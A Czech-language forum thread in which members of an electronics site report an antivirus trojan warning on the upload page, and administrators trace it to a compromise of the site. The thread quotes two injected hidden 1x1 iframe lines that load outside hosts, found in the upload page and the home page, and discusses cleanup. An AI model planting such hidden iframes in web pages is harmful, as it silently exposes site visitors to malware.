Trojskej kun

❓ Připomínky a dotazy pro administrátory a moderátory. Zde řešte problémy s přihlášením či heslem, můžete navrhnout otevření nové rubriky v diskuzním fóru či napsat případné připomínky k portálu nebo diskuzi.

Moderátor: Moderátoři

Zpráva
Autor
Uživatelský avatar
ccarloss
Příspěvky: 197
Registrován: 22 kvě 2007, 02:00

Trojskej kun

#1 Příspěvek od ccarloss »

Klepnul jsem na upload a pc mi ohlasil trojskeho kone


mam NOD32

Uživatelský avatar
MetalGod
Příspěvky: 6556
Registrován: 30 kvě 2006, 02:00
Bydliště: Seč

#2 Příspěvek od MetalGod »

Už o tom byla zmínka tady: http://www.ebastlirna.cz/modules.php?na ... ght=#80322
A koukám, že se to ještě nevyřešilo
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill

Uživatelský avatar
Radix
Příspěvky: 2633
Registrován: 14 lis 2006, 01:00

#3 Příspěvek od Radix »

Pořiď si Linux.
Teď zkouším skvělého Sama.

Uživatelský avatar
Raptor181
Moderátor
Moderátor
Příspěvky: 1194
Registrován: 01 led 2004, 01:00
Bydliště: West Slovakia

#4 Příspěvek od Raptor181 »

WIN XP, NOD32 a ziadny konik, ani pejko...
Èo neubrzdíš, to neukecáš..:pc:
:aplause::)
Oživenie umrtvených RJ, tacho, immo, airbag, diagnostika automobilov, chiptuning, kódovanie a dorábky systémov, autoelektrika, zabezpeèovacie a kamerové systémy

Uživatelský avatar
meno
Příspěvky: 930
Registrován: 04 říj 2004, 02:00
Bydliště: Czechoslovakia

#5 Příspěvek od meno »

Ja mám NOD32 a AVG a nehlási mi to nič :nevim:
:D :D :D

Uživatelský avatar
galjo
Příspěvky: 1352
Registrován: 15 črc 2005, 02:00
Bydliště: záp.slovensko

#6 Příspěvek od galjo »

ani DrWeb nič nehlásí.... A sem tam mi aj klúč z cracku uprace do archivu...

Uživatelský avatar
MetalGod
Příspěvky: 6556
Registrován: 30 kvě 2006, 02:00
Bydliště: Seč

#7 Příspěvek od MetalGod »

Tak už asi ten problém (jak pro koho :D) vyřešili.
Ale pokud se někomu z vás po tom oři z Tróje stejská, nechť mi napíše- mám ho staženej na ploše 8-)
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill

Uživatelský avatar
ZdenekHQ
Administrátor
Administrátor
Příspěvky: 25593
Registrován: 21 črc 2006, 02:00
Bydliště: skoro Brno
Kontaktovat uživatele:

#8 Příspěvek od ZdenekHQ »

Už to vidím, je to na konci stránky nekorektně přilepený za /html -někdo to přidal do php kódu, co generuje stránku uploadu. Použil zřejmě script, co přidá cokoliv na konec souboru.

Kód: Vybrat vše

iframe src='http://zaebiz.awardspace.com' width='1' height='1' style='visibility: hidden;'></iframe>
Je potřeba to ručně otevřít na serveru a smazat.

Vám, co to hlásí virus, máte předpokládám jako prohlížeč IE ?
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?
]

Uživatelský avatar
meno
Příspěvky: 930
Registrován: 04 říj 2004, 02:00
Bydliště: Czechoslovakia

#9 Příspěvek od meno »

Já mam Firefoxa a nič nehlási , dúfam že už toho Trójana nemám na disku :lol:

Ale ak tam je tak by ho už mohol za tie 2dni aj niekto odstrániť !!! Nech sa zbytočne nešíri všelijaká haveď !!!
:D :D :D

Uživatelský avatar
ZdenekHQ
Administrátor
Administrátor
Příspěvky: 25593
Registrován: 21 črc 2006, 02:00
Bydliště: skoro Brno
Kontaktovat uživatele:

#10 Příspěvek od ZdenekHQ »

Já mám taky FF a jelikož předpokládám, že se chová korektně, tak všechno za koncovou značkou html ignoruje. Navíc antivir mlčí a žádný nový port se mě neotevřel ani se neobjevil nový proces "na pozadí".
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?
]

Uživatelský avatar
MetalGod
Příspěvky: 6556
Registrován: 30 kvě 2006, 02:00
Bydliště: Seč

#11 Příspěvek od MetalGod »

meno píše:Já mam Firefoxa a nič nehlási , dúfam že už toho Trójana nemám na disku :lol:
Já to na hadrdüsku mám, dokonce přímo na ploše.
Nechce toho koníka někdo poslat? Je to má poslední nabídka! :D
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill

Uživatelský avatar
ZdenekHQ
Administrátor
Administrátor
Příspěvky: 25593
Registrován: 21 črc 2006, 02:00
Bydliště: skoro Brno
Kontaktovat uživatele:

#12 Příspěvek od ZdenekHQ »

No - a teď ten blbec už rozvrtal i hlavní index a kdoví co ješte.

Myslím si, že pokud hlavní admin nemá čas se o fórum starat, tak má předat heslo od FTP a ostatní někomu, kdo na to čas má a taky občas zalátá nějakou tu bezpečnostní díru. Zatím se to nestalo ani u té staré.

Až spadne i databáze, bude celá bastlírna víte kde ! :evil:
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?
]

Uživatelský avatar
Crifodo
Příspěvky: 14471
Registrován: 11 říj 2005, 02:00

#13 Příspěvek od Crifodo »

po připojení na domovskou stránku Bastlírny mám ve zdrojovém kódu stránky
<!-- ~ --><iframe src='http://zaebiz.freehostia.com' width='1' height='1' style='visibility: hidden;'></iframe><!-- ~ -->

něco tu zapáchá...

Uživatelský avatar
ZdenekHQ
Administrátor
Administrátor
Příspěvky: 25593
Registrován: 21 črc 2006, 02:00
Bydliště: skoro Brno
Kontaktovat uživatele:

#14 Příspěvek od ZdenekHQ »

No jo, blboun zkouší nakazit všechny soubory a ujela mu ruka, takže index přepsal. Je potřeba se dostat na FTP, podívat se, jestli tam nemá vlastní uploadovací script nebo používá administraci - a každopádně ho zavčas zlikvidovat, než sejme databázi. Zatím si jenom hraje, tohle profi útok není.
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?
]

Uživatelský avatar
Crifodo
Příspěvky: 14471
Registrován: 11 říj 2005, 02:00

#15 Příspěvek od Crifodo »

ZdenekHQ píše:No jo, blboun zkouší nakazit všechny soubory a ujela mu ruka, takže index přepsal. Je potřeba se dostat na FTP, podívat se, jestli tam nemá vlastní uploadovací script nebo používá administraci - a každopádně ho zavčas zlikvidovat, než sejme databázi. Zatím si jenom hraje, tohle profi útok není.
napřed by to chtělo ho identifikovat, to snad nebude pro admina nemožné.
Pak zveřejnit a nakonec uspořádat trestnou výpravu.
Rád věnuju kastrovací nožík :twisted:

Odpovědět

Zpět na „Provoz fóra“